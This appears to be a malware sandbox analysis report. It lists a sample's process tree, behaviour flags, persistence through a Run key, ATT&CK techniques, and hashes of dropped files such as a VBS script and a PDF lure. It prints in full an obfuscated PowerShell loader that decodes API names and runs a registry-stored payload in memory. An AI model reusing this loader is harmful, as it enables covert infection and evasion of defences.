"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";Function Selvmordsforsgene0 { param([String]$Hookaroon); $slagregnen = New-Object byte[] ($Hookaroon.Length / 2); For($Bedstemdre=0; $Bedstemdre -lt $Hookaroon.Length; $Bedstemdre+=2){ $slagregnen[$Bedstemdre/2] = [convert]::ToByte($Hookaroon.Substring($Bedstemdre, 2), 16); $slagregnen[$Bedstemdre/2] = ($slagregnen[$Bedstemdre/2] -bxor 210); } [String][System.Text.Encoding]::ASCII.GetString($slagregnen);}$Forladelsens0=Selvmordsforsgene0 '81ABA1A6B7BFFCB6BEBE';$Forladelsens1=Selvmordsforsgene0 '9FBBB1A0BDA1BDB4A6FC85BBBCE1E0FC87BCA1B3B4B79CB3A6BBA4B79FB7A6BABDB6A1';$Forladelsens2=Selvmordsforsgene0 '95B7A682A0BDB193B6B6A0B7A1A1';$Forladelsens3=Selvmordsforsgene0 '81ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4';$Forladelsens4=Selvmordsforsgene0 'A1A6A0BBBCB5';$Forladelsens5=Selvmordsforsgene0 '95B7A69FBDB6A7BEB79AB3BCB6BEB7';$Forladelsens6=Selvmordsforsgene0 '808681A2B7B1BBB3BE9CB3BFB7FEF29ABBB6B790AB81BBB5FEF282A7B0BEBBB1';$Forladelsens7=Selvmordsforsgene0 '80A7BCA6BBBFB7FEF29FB3BCB3B5B7B6';$Forladelsens8=Selvmordsforsgene0 '80B7B4BEB7B1A6B7B696B7BEB7B5B3A6B7';$Forladelsens9=Selvmordsforsgene0 '9BBC9FB7BFBDA0AB9FBDB6A7BEB7';$Raught0=Selvmordsforsgene0 '9FAB96B7BEB7B5B3A6B786ABA2B7';$Raught1=Selvmordsforsgene0 '91BEB3A1A1FEF282A7B0BEBBB1FEF281B7B3BEB7B6FEF293BCA1BB91BEB3A1A1FEF293A7A6BD91BEB3A1A1';$Raught2=Selvmordsforsgene0 '9BBCA4BDB9B7';$Raught3=Selvmordsforsgene0 '82A7B0BEBBB1FEF29ABBB6B790AB81BBB5FEF29CB7A581BEBDA6FEF284BBA0A6A7B3BE';$Raught4=Selvmordsforsgene0 '84BBA0A6A7B3BE93BEBEBDB1';$Raught5=Selvmordsforsgene0 'BCA6B6BEBE';$Raught6=Selvmordsforsgene0 '9CA682A0BDA6B7B1A684BBA0A6A7B3BE9FB7BFBDA0AB';$Raught7=Selvmordsforsgene0 '9B978A';$Raught8=Selvmordsforsgene0 '8E';$Addiction=Selvmordsforsgene0 '87819780E1E0';$Beautifiers=Selvmordsforsgene0 '91B3BEBE85BBBCB6BDA582A0BDB193';function Selvmordsforsgene22 {Param ($autorisation, $Najedes) ;$Pherecratic0 =Selvmordsforsgene0 'F69FABBEB6A0B7A6BBB6B7A0A1F2EFF2FA8993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC95B7A693A1A1B7BFB0BEBBB7A1FAFBF2AEF285BAB7A0B7FF9DB0B8B7B1A6F2A9F2F68DFC95BEBDB0B3BE93A1A1B7BFB0BEAB91B3B1BAB7F2FF93BCB6F2F68DFC9EBDB1B3A6BBBDBCFC81A2BEBBA6FAF680B3A7B5BAA6EAFB89FFE38FFC97A3A7B3BEA1FAF694BDA0BEB3B6B7BEA1B7BCA1E2FBF2AFFBFC95B7A686ABA2B7FAF694BDA0BEB3B6B7BEA1B7BCA1E3FB';.$Raught7 $Pherecratic0;$Pherecratic5 = Selvmordsforsgene0 'F681B7BCB6B7B0A7B6B6B7A6A1F2EFF2F69FABBEB6A0B7A6BBB6B7A0A1FC95B7A69FB7A6BABDB6FAF694BDA0BEB3B6B7BEA1B7BCA1E0FEF28986ABA2B7898F8FF292FAF694BDA0BEB3B6B7BEA1B7BCA1E1FEF2F694BDA0BEB3B6B7BEA1B7BCA1E6FBFB';.$Raught7 $Pherecratic5;$Pherecratic1 = Selvmordsforsgene0 'A0B7A6A7A0BCF2F681B7BCB6B7B0A7B6B6B7A6A1FC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FA8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B48FFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9AB3BCB6BEB780B7B4FAFA9CB7A5FF9DB0B8B7B1A6F29BBCA682A6A0FBFEF2FAF69FABBEB6A0B7A6BBB6B7A0A1FC95B7A69FB7A6BABDB6FAF694BDA0BEB3B6B7BEA1B7BCA1E7FBFBFC9BBCA4BDB9B7FAF6BCA7BEBEFEF292FAF6B3A7A6BDA0BBA1B3A6BBBDBCFBFBFBFBFEF2F69CB3B8B7B6B7A1FBFB';.$Raught7 $Pherecratic1;}function Selvmordsforsgene23 {Param ([Parameter(Position = 0)] [Type[]] $Diversificerendes,[Parameter(Position = 1)] [Type] $Bikarbonatet = [Void]);$Pherecratic2 = Selvmordsforsgene0 'F693BCA1BBB5A6A1B1A0B7BFB7BCF2EFF28993A2A296BDBFB3BBBC8FE8E891A7A0A0B7BCA696BDBFB3BBBCFC96B7B4BBBCB796ABBCB3BFBBB193A1A1B7BFB0BEABFAFA9CB7A5FF9DB0B8B7B1A6F281ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC93A1A1B7BFB0BEAB9CB3BFB7FAF694BDA0BEB3B6B7BEA1B7BCA1EAFBFBFEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC97BFBBA6FC93A1A1B7BFB0BEAB90A7BBBEB6B7A093B1B1B7A1A18FE8E880A7BCFBFC96B7B4BBBCB796ABBCB3BFBBB19FBDB6A7BEB7FAF694BDA0BEB3B6B7BEA1B7BCA1EBFEF2F6B4B3BEA1B7FBFC96B7B4BBBCB786ABA2B7FAF680B3A7B5BAA6E2FEF2F680B3A7B5BAA6E3FEF28981ABA1A6B7BFFC9FA7BEA6BBB1B3A1A696B7BEB7B5B3A6B78FFB';.$Raught7 $Pherecratic2;$Pherecratic3 = Selvmordsforsgene0 'F693BCA1BBB5A6A1B1A0B7BFB7BCFC96B7B4BBBCB791BDBCA1A6A0A7B1A6BDA0FAF694BDA0BEB3B6B7BEA1B7BCA1E4FEF28981ABA1A6B7BFFC80B7B4BEB7B1A6BBBDBCFC91B3BEBEBBBCB591BDBCA4B7BCA6BBBDBCA18FE8E881A6B3BCB6B3A0B6FEF2F696BBA4B7A0A1BBB4BBB1B7A0B7BCB6B7A1FBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF694BDA0BEB3B6B7BEA1B7BCA1E5FB';.$Raught7 $Pherecratic3;$Pherecratic4 = Selvmordsforsgene0 'F693BCA1BBB5A6A1B1A0B7BFB7BCFC96B7B4BBBCB79FB7A6BABDB6FAF680B3A7B5BAA6E0FEF2F680B3A7B5BAA6E1FEF2F690BBB9B3A0B0BDBCB3A6B7A6FEF2F696BBA4B7A0A1BBB4BBB1B7A0B7BCB6B7A1FBFC81B7A69BBFA2BEB7BFB7BCA6B3A6BBBDBC94BEB3B5A1FAF694BDA0BEB3B6B7BEA1B7BCA1E5FB';.$Raught7 $Pherecratic4;$Pherecratic5 = Selvmordsforsgene0 'A0B7A6A7A0BCF2F693BCA1BBB5A6A1B1A0B7BFB7BCFC91A0B7B3A6B786ABA2B7FAFB';.$Raught7 $Pherecratic5 ;}$Stabejser = Selvmordsforsgene0 'B9B7A0BCB7BEE1E0';$Pherecratic6 = Selvmordsforsgene0 'F69EBDB1B3A6BBBCB5F2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFA81B7BEA4BFBDA0B6A1B4BDA0A1B5B7BCB7E0E0F2F681A6B3B0B7B8A1B7A0F2F680B3A7B5BAA6E6FBFEF2FA81B7BEA4BFBDA0B6A1B4BDA0A1B5B7BCB7E0E1F292FA899BBCA682A6A08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFEF289879BBCA6E1E08FFBF2FA899BBCA682A6A08FFBFBFB';.$Raught7 $Pherecratic6;$Pladsholderes = Selvmordsforsgene22 $Raught5 $Raught6;$Pherecratic7 = Selvmordsforsgene0 'F69EB7A4B7B6ABB5A6BBB5A1A6B7A1E3E6E6E1F2EFF2F69EBDB1B3A6BBBCB5FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E4E6E7FEF2E2AAE1E2E2E2FEF2E2AAE6E2FB';.$Raught7 $Pherecratic7;$Pherecratic8 = Selvmordsforsgene0 'F682BABDBCB7ABA1F2EFF2F69EBDB1B3A6BBBCB5FC9BBCA4BDB9B7FA899BBCA682A6A08FE8E888B7A0BDFEF2E5E0E1EAE6E7E3E0FEF2E2AAE1E2E2E2FEF2E2AAE6FB';.$Raught7 $Pherecratic8;$Brekker63=(Get-ItemProperty -Path 'HKCU:\Enebarns\writhed').Anfred;$Pherecratic9 = Selvmordsforsgene0 'F682BAB7A0B7B1A0B3A6BBB1F2EFF28981ABA1A6B7BFFC91BDBCA4B7A0A68FE8E894A0BDBF90B3A1B7E4E681A6A0BBBCB5FAF690A0B7B9B9B7A0E4E1FB';.$Raught7 $Pherecratic9;$Brekker630 = Selvmordsforsgene0 '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF682BAB7A0B7B1A0B3A6BBB1FEF2E2FEF2F2F69EB7A4B7B6ABB5A6BBB5A1A6B7A1E3E6E6E1FEF2E4E6E7FB';.$Raught7 $Brekker630;$Undermesteren=$Pherecratic.count-645;$Brekker631 = Selvmordsforsgene0 '8981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E891BDA2ABFAF682BAB7A0B7B1A0B3A6BBB1FEF2E4E6E7FEF2F682BABDBCB7ABA1FEF2F687BCB6B7A0BFB7A1A6B7A0B7BCFB';.$Raught7 $Brekker631;$Brekker632 = Selvmordsforsgene0 'F694BEB3A6BFB7BCF2EFF28981ABA1A6B7BFFC80A7BCA6BBBFB7FC9BBCA6B7A0BDA281B7A0A4BBB1B7A1FC9FB3A0A1BAB3BE8FE8E895B7A696B7BEB7B5B3A6B794BDA094A7BCB1A6BBBDBC82BDBBBCA6B7A0FAFA81B7BEA4BFBDA0B6A1B4BDA0A1B5B7BCB7E0E0F2F693B6B6BBB1A6BBBDBCF2F690B7B3A7A6BBB4BBB7A0A1FBFEF2FA81B7BEA4BFBDA0B6A1B4BDA0A1B5B7BCB7E0E1F292FA899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFEF2899BBCA682A6A08FFBF2FA899BBCA682A6A08FFBFBFB';&($Raught7) $Brekker632;$Brekker633 = Selvmordsforsgene0 'F694BEB3A6BFB7BCFC9BBCA4BDB9B7FAF69EB7A4B7B6ABB5A6BBB5A1A6B7A1E3E6E6E1FEF682BABDBCB7ABA1FEF682BEB3B6A1BABDBEB6B7A0B7A1FEE2FEE2FB';&($Raught7) $Brekker633#"
6⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2660

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
7⤵
PID:604

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
7⤵
PID:2524

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
7⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2168

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\info.pdf"
4⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3460

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
5⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7A4BA7FBA04441898230A0C35D2E4D65 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7A4BA7FBA04441898230A0C35D2E4D65 --renderer-client-id=2 --mojo-platform-channel-handle=1712 --allow-no-sandbox-job /prefetch:1
6⤵
PID:320

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=04D5B16935D1EF389BF6820647C0DF1A --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
6⤵
PID:3824

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CEF6B841C64501629B0B5D321E8A561D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CEF6B841C64501629B0B5D321E8A561D --renderer-client-id=4 --mojo-platform-channel-handle=2148 --allow-no-sandbox-job /prefetch:1
6⤵
PID:3356

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=51764EE28C01CD4AEB5505E53DAF3EE1 --mojo-platform-channel-handle=2572 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
6⤵
PID:940

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=31CF44CE73E4D22213904E5E72FE6018 --mojo-platform-channel-handle=2012 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
6⤵
PID:3676

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E5424D216DD50A194B21F5CD9033AAEF --mojo-platform-channel-handle=2676 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
6⤵
PID:3928

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
5⤵
PID:1348

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2404

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
Filesize
64KB

MD5
cea6fc58497f12a4b4dbef53beedfa14

SHA1
83232835906d9a0ec8f3f3932eae1598d86b20d8

SHA256
d90d27d5f54ff85bbcf947fbb96f909219e630621a46f6b5c5aa4390ba3ecab5

SHA512
080709daa88c96bea40dceb18c58f0bdca53b2e23bbe842d20e695cc3ad6a9f6d0b5bb50a974c3c931534b335b422df7ffcf4e7da885e51828cd2f6ec92fabb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
54eea9572b8a1295c4226dd63cadef78

SHA1
1572cc403c755aa7faeb0ee2e795d449e61d485f

SHA256
47b23fd79d8b2504103e2ffbd3866956a332f4c6d37625195ca0f5ab76a39ee3

SHA512
ca125313f150c27926efd0832f81964c3a6a72a42fa7a4bb9fb8579661d26b6b29ee621683b7be0c84371ce4b3791dcf9fd9da0836fb67c7dd331012dbd48809

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e2b7ef166be2b6b63d26b2322e17b207

SHA1
6c3c71bd04834ac1b13f7f9a259ba5dc1116fbe1

SHA256
888450ebea46665a1c852bd8b82e15071d98c567173b88e9e1e7c893745d2d59

SHA512
44cd1e323e130fddb69cf8057577213532025a658a701f739f700a1ede0fbb04b3de5ded95b6606d012717f4ffa29a2125a641afac84247e55675033e329c6e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cxjc5ok.zgg.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\info.pdf
Filesize
1.1MB

MD5
1ab5c51d52fe2de4eca465084a051674

SHA1
f14111a99de26b98a592fc5256404156e6e3a704

SHA256
057b1da6363eedc2156003b8547ac57116793278b0b0b21767cc05fc8b143b99

SHA512
f09507bfc8765d73c937ff1dfd9af44b91866c1d7e60943c2a812fc6038bab995c4e5cde26f118b18af02ef33ca259d7fdb65b325d0f505a261f4b13635406aa

Download Submit
C:\Windows\Tasks\Serolere.vbs
Filesize
209KB

MD5
f2b7c0cd2012b69148a409aae6852294

SHA1
35dd823f0e661529f6173530f9e97c8c355c6044

SHA256
c914dab00f2b1d63c50eb217eeb29bcd5fe20b4e61538b0d9d052ff1b746fd73

SHA512
c78a54d2aea88ea5571a423d5bd3ea4f437369d8d40529159633759a27bf2c1569b8881d163ccf125138fac8875ce99592b854860d98611c28da43f63ac1b496

Download Submit
memory/1464-145-0x00000227F5BC0000-0x00000227F5BD0000-memory.dmp

Filesize
64KB

Download
memory/1464-149-0x00000227F81B0000-0x00000227F81DE000-memory.dmp

Filesize
184KB

Download
memory/1464-148-0x00000227F5BC0000-0x00000227F5BD0000-memory.dmp

Filesize
64KB

Download
memory/1464-147-0x00000227F8070000-0x00000227F808C000-memory.dmp

Filesize
112KB

Download
memory/1464-146-0x00007FF962470000-0x00007FF962525000-memory.dmp

Filesize
724KB

Download
memory/1464-139-0x00000227F7250000-0x00000227F7272000-memory.dmp

Filesize
136KB

Download
memory/1464-144-0x00000227F5BC0000-0x00000227F5BD0000-memory.dmp

Filesize
64KB

Download
memory/1464-143-0x00000227F5BC0000-0x00000227F5BD0000-memory.dmp

Filesize
64KB

Download
memory/2168-361-0x0000000000E10000-0x0000000005318000-memory.dmp

Filesize
69.0MB

Download
memory/2168-360-0x0000000000E10000-0x0000000005318000-memory.dmp

Filesize
69.0MB

Download
memory/2168-345-0x0000000000E10000-0x0000000005318000-memory.dmp

Filesize
69.0MB

Download
memory/2660-176-0x0000000005230000-0x0000000005252000-memory.dmp

Filesize
136KB

Download
memory/2660-220-0x0000000007390000-0x00000000073B2000-memory.dmp

Filesize
136KB

Download
memory/2660-177-0x0000000005A10000-0x0000000005A76000-memory.dmp

Filesize
408KB

Download
memory/2660-178-0x0000000005A80000-0x0000000005AE6000-memory.dmp

Filesize
408KB

Download
memory/2660-189-0x0000000006180000-0x000000000619E000-memory.dmp

Filesize
120KB

Download
memory/2660-210-0x0000000007AE0000-0x000000000815A000-memory.dmp

Filesize
6.5MB

Download
memory/2660-211-0x0000000006470000-0x000000000648A000-memory.dmp

Filesize
104KB

Download
memory/2660-172-0x00000000027D0000-0x0000000002806000-memory.dmp

Filesize
216KB

Download
memory/2660-241-0x0000000008160000-0x000000000C668000-memory.dmp

Filesize
69.0MB

Download
memory/2660-174-0x0000000002880000-0x0000000002890000-memory.dmp

Filesize
64KB

Download
memory/2660-218-0x0000000007460000-0x00000000074F6000-memory.dmp

Filesize
600KB

Download
memory/2660-173-0x0000000002880000-0x0000000002890000-memory.dmp

Filesize
64KB

Download
